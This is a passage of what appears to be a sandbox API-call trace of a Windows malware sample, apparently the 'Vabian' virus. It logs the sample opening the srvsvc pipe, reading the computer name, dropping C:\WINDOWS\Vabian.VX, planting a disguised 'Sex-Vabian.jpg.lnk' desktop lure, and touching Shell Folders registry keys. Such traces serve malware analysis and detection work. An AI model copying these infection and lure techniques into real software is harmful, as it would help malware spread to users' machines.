ShareAccess => 3 FileName => PIPE\srvsvc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtSetInformationFile |
FileHandle => 0x0000020c FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,453 | 252 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xc8O2Kp\x16\xd3\x01\x12xZG\xbfn\xe1\x88\x03\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x9c&\x00\x00
\x00\PIPE\srvsvc\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x0000020c ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\ComputerName |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000214 ObjectAttributes => ActiveComputerName |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtQueryValueKey |
Information => M\x00I\x00K\x00E\x00-\x00B\x00D\x000\x001\x009\x006\x00D\x000\x003\x009\x00\x00\x00 KeyHandle => 0x00000214 ValueName => ComputerName Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DestroyLinkInfo FunctionAddress => 0x7698185f ModuleHandle => 0x76980000 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 7 FileName => C:\WINDOWS\Vabian.VX DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => \x90\x9e\x04?\xac\x9f\xd3\x01\x90\x9e\x04?\xac\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01 \x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xab9\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x80\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x01\x00\x00\x00$\x00\x00\x00\\x00W\x00 |
FAILURE | 0x80000005 | |
| 19:40:26,453 | 252 | DeviceIoControl |
DeviceHandle => 0x0000020c OutBuffer => \xc1Z\xab\xb2\x96\x0b\xe8\x11\x8c\x1b\x08\x00'\xc8RU\xb8\xf1\xf7v\xcfshN\x81\xce7;\xa3\xba\x01\x1b\xc1Z\xab\xb2\x96\x0b\xe8\x11\x8c\x1b\x08\x00'\xc8RU\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 IoControlCode => 590016 InBuffer => |
SUCCESS | 0x00000001 | |
| 19:40:26,453 | 252 | NtOpenFile |
ShareAccess => 3 FileName => C:\WINDOWS DesiredAccess => 0x00100080 FileHandle => 0x00000000 |
FAILURE | 0xc00000ba | |
| 19:40:26,453 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => \x03\x00\x00\x00\\xd6\x13\x00\xa7\x1b\x83|\x1c\xdb\x13\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00 \x02\xff\xff\xff\xff@\x00\x00\x00\xe3\xc2\xc2w\x00\xdb\x13\x00w\x1b\x83|\x1c\xdb\x13\x00\xec\xd6\x13\x00\x04\x01\x00\x00\x00\x00\x00\x00D\xdd\x13\x00\x0c\x02\x00\x00\x08\xb0\x17\x00,\x01\x00\x00\x99\xa4\x80|\x80/\x16\x00\x01\x00\x00\x0ex\xd7\x13\x00\x16\x00\x00\x00L\xd7\x13\x00\x18\xb8C\x00\x00\x00\x00\x00\x1c\xdb\x13\x00\x18\x00\x00\x00\x00\x00\x00\x00\xe0\xd6\x13\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\xfb\x7f\xf6\xacoex\xd7\x13\x00\x16\x00\x00\x00\x00\x00\x00\x00\x01\x00\x10\x00\xba\x00\x00\xc0\xa0 \x16\x00\x1c\x00\x1a\x02\xa0 \x16\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x00\x00\x00\xd7\x13\x00L\xd7\x13\x00\x16\x00\x00\x00\x05\x9e\x80|\x80/\x16\x00\x1c\x00\xfb\x7f\xf6\xacoe\xe0\xacoe\x16\x00\x00\x00T\x00_\x00D\x00I\x00G\x00I\x00\xfc\xd4\x00\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\WINDOWS\ DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | DeviceIoControl |
DeviceHandle => 0x00000214 OutBuffer => x\x01\x16\x00(\x14\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 IoControlCode => 589992 InBuffer => |
FAILURE | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenFile |
ShareAccess => 3 FileName => C:\WINDOWS DesiredAccess => 0x00100080 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000214 ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\ComputerName |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000218 ObjectAttributes => ActiveComputerName |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtQueryValueKey |
Information => M\x00I\x00K\x00E\x00-\x00B\x00D\x000\x001\x009\x006\x00D\x000\x003\x009\x00\x00\x00 KeyHandle => 0x00000218 ValueName => ComputerName Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\All Users\Desktop\Sex-Vabian.jpg.lnk DesiredAccess => 0xc0100080 CreateDisposition => 5 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SHChangeNotify FunctionAddress => 0x7ca24909 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegOpenKeyExW |
Handle => 0x00000216 Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegEnumKeyW |
Handle => 0x00000216 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegOpenKeyExW |
Handle => 0x0000021a Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegQueryValueExW |
Handle => 0x0000021a Data => 32 ValueName => DriveMask |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegCloseKey |
Handle => 0x0000021a |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegEnumKeyW |
Handle => 0x00000216 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 1 |
FAILURE | 0x00000103 | |
| 19:40:26,453 | 252 | RegCloseKey |
Handle => 0x00000216 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0007 SectionHandle => 0x00000214 FileHandle => 0x00000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e09c SectionHandle => 0x00000214 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e0bc SectionHandle => 0x00000218 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00S\x00t\x00a\x00r\x00t\x00 \x00M\x00e\x00n\x00u\x00\x00\x00 ValueName => Start Menu |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegSetValueExW |
Handle => 0x00000218 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00S\x00t\x00a\x00r\x00t\x00 \x00M\x00e\x00n\x00u\x00\x00\x00 ValueName => Start Menu Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\Start Menu |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => %\x00A\x00L\x00L\x00U\x00S\x00E\x00R\x00S\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00S\x00t\x00a\x00r\x00t\x00 \x00M\x00e\x00n\x00u\x00\x00\x00 ValueName => Common Start Menu |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegSetValueExW |
Handle => 0x00000214 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00S\x00t\x00a\x00r\x00t\x00 \x00M\x00e\x00n\x00u\x00\x00\x00 ValueName => Common Start Menu Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => (\x01\x00\x00\x00\x00\x00\x00&\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
[LocalizedFileNames]
Windows Catalog.lnk=@%SystemRoot%\system32\shell32.dll,-22075
Activate Windows.lnk=@%SystemRoot%\system32\oobe\msoobe.exe,-2000
Set Program Access and Defaults.lnk=@%Syst FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => (\x01\x00\x00\x00\x00\x00\x00&\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
[LocalizedFileNames]
Windows Catalog.lnk=@%SystemRoot%\system32\shell32.dll,-22075
Activate Windows.lnk=@%SystemRoot%\system32\oobe\msoobe.exe,-2000
Set Program Access and Defaults.lnk=@%Syst FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => (\x01\x00\x00\x00\x00\x00\x00&\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
[LocalizedFileNames]
Windows Catalog.lnk=@%SystemRoot%\system32\shell32.dll,-22075
Activate Windows.lnk=@%SystemRoot%\system32\oobe\msoobe.exe,-2000
Set Program Access and Defaults.lnk=@%Syst FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => %\x00A\x00L\x00L\x00U\x00S\x00E\x00R\x00S\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => Common AppData |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegSetValueExW |
Handle => 0x00000218 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => Common AppData Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => AppData |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegSetValueExW |
Handle => 0x00000214 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => AppData Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
